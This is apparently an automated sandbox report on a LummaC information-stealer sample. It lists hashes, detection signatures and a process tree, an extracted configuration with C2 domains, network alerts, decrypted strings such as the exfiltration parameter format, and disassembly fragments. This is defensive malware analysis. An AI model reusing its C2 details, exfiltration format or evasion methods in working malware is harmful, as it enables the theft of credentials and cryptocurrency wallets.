Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lBb4XI4eGD.exe

Overview

General Information

Sample name:lBb4XI4eGD.exe
renamed because original name is a hash value
Original sample name:4c9a8f87a919e9fccd2476b3689d05de.exe
Analysis ID:1589513
MD5:4c9a8f87a919e9fccd2476b3689d05de
SHA1:3351e4e7a0f54f5beacad77d1f5de210fb97e70a
SHA256:77d5024e1e13eb0c8fd9119ab314bf283252232465f2e995372a844a8e7b4a97
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • lBb4XI4eGD.exe (PID: 3684 cmdline: "C:\Users\user\Desktop\lBb4XI4eGD.exe" MD5: 4C9A8F87A919E9FCCD2476B3689D05DE)
    • E6F4.tmp.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Local\Temp\E6F4.tmp.exe" MD5: 08494E6A1E788EA3259955A4524FDFEC)
      • WerFault.exe (PID: 1528 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4052 -s 1004 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["skidjazzyric.click", "versersleep.shop", "soundtappysk.shop", "apporholis.shop", "crowdwarek.shop", "chipdonkeruz.shop", "femalsabler.shop", "handscreamny.shop", "robinsharez.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.1651009881.0000000000602000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1760:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1650825713.0000000000580000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3954477135.0000000000783000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0xd98:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.028869+010020283713Unknown Traffic192.168.2.849709104.102.49.254443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.223941+010020590351Domain Observed Used for C2 Detected192.168.2.8606831.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.332886+010020590371Domain Observed Used for C2 Detected192.168.2.8588131.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.236473+010020590391Domain Observed Used for C2 Detected192.168.2.8495471.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.137039+010020590411Domain Observed Used for C2 Detected192.168.2.8574751.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.345372+010020590431Domain Observed Used for C2 Detected192.168.2.8604701.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.357464+010020590491Domain Observed Used for C2 Detected192.168.2.8593881.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.108090+010020590881Domain Observed Used for C2 Detected192.168.2.8596781.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.124282+010020590511Domain Observed Used for C2 Detected192.168.2.8592461.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:31.246922+010020590571Domain Observed Used for C2 Detected192.168.2.8568721.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:27.263264+010028032742Potentially Bad Traffic192.168.2.849707172.67.179.207443TCP
    2025-01-12T17:45:28.090254+010028032742Potentially Bad Traffic192.168.2.849708176.113.115.1980TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:45:32.515158+010028586661Domain Observed Used for C2 Detected192.168.2.849709104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://post-to-me.com/2UAvira URL Cloud: Label: malware
    Source: https://chipdonkeruz.shop/apiAvira URL Cloud: Label: malware
    Source: https://post-to-me.com/track_prt.php?sub=Avira URL Cloud: Label: malware
    Source: https://post-to-me.com/Avira URL Cloud: Label: malware
    Source: 3.3.E6F4.tmp.exe.21b0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["skidjazzyric.click", "versersleep.shop", "soundtappysk.shop", "apporholis.shop", "crowdwarek.shop", "chipdonkeruz.shop", "femalsabler.shop", "handscreamny.shop", "robinsharez.shop"], "Build id": "4h5VfH--"}
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeReversingLabs: Detection: 50%
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeReversingLabs: Detection: 50%
    Source: lBb4XI4eGD.exeVirustotal: Detection: 40%Perma Link
    Source: lBb4XI4eGD.exeReversingLabs: Detection: 50%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeJoe Sandbox ML: detected
    Source: lBb4XI4eGD.exeJoe Sandbox ML: detected
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: robinsharez.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: handscreamny.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: chipdonkeruz.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: versersleep.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: crowdwarek.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: apporholis.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: femalsabler.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: soundtappysk.shop
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: skidjazzyric.click
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000003.00000003.1572447806.00000000021B0000.00000004.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--

    Compliance

    barindex
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeUnpacked PE file: 0.2.lBb4XI4eGD.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeUnpacked PE file: 3.2.E6F4.tmp.exe.400000.0.unpack
    Source: lBb4XI4eGD.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.8:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49709 version: TLS 1.2
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_02178C49 FindFirstFileExW,0_2_02178C49
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040B2B0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00419840
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0040A05C
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00427070
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042D830
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0043F0E0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B882
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then jmp eax3_2_004418A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B173
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B170
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041A900
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B184
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then test esi, esi3_2_0043C9A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041B243
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EA62
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00402210
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040AA32
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_00425AF0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00428280
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041F2A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EB5F
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042BB00
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041BB21
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441B20
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041AB2A
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0040C334
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]3_2_0040C3EC
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebx, edx3_2_0042DBF0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then jmp ecx3_2_0040D334
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00422380
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0041BBA0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0042BBA0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBA1
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00440BAB
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBB3
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441BB0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441C40
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00442470
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00426C76
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov eax, edi3_2_0041C400
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00414C20
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B484
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00427490
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00425D6A
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00438520
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_00442D20
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then push edi3_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B652
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B667
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00418672
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409E09
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then jmp ecx3_2_0040CEC7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00416ED0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0041BEE1
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041AEFF
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov esi, ecx3_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_00408F90
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_004427B0
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0058A070
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov esi, ecx3_2_005960EF
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0059C148
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0059B166
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00597137
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then jmp ecx3_2_0058D12E
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_005891F7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_005C21EA
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0058E249
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0058E249
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0058A2C3
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_005BF347
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0059B3DA
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0059B3EB
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00582477
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_005A84E7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0059B4AA
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0059F507
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_005A25E7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0058C59B
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then jmp ecx3_2_0058D59B
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov eax, edi3_2_0059C667
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_005C26D7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_005A76F7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0059B6EB
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_005C0694
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_005C0694
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0059773F
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_005B8787
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00598809
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then push edi3_2_005BC807
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_005BC807
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_005958FA
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00587887
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00587887
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_005AB8B5
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0058BA6C
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_005C2A17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_005BBAD7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov edx, ecx3_2_005BBAD7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0059BAE9
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00597AE4
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00597AE4
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_005ADA97
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00599AA7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0059AB67
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_005A6BA7
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then test esi, esi3_2_005BCC07
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then jmp eax3_2_005C1C3E
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_005AECC9
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0058AC99
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_005A5D57
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_005ABD67
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00596D15
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00585D17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00585D17
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_005AEDC6
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0059AD91
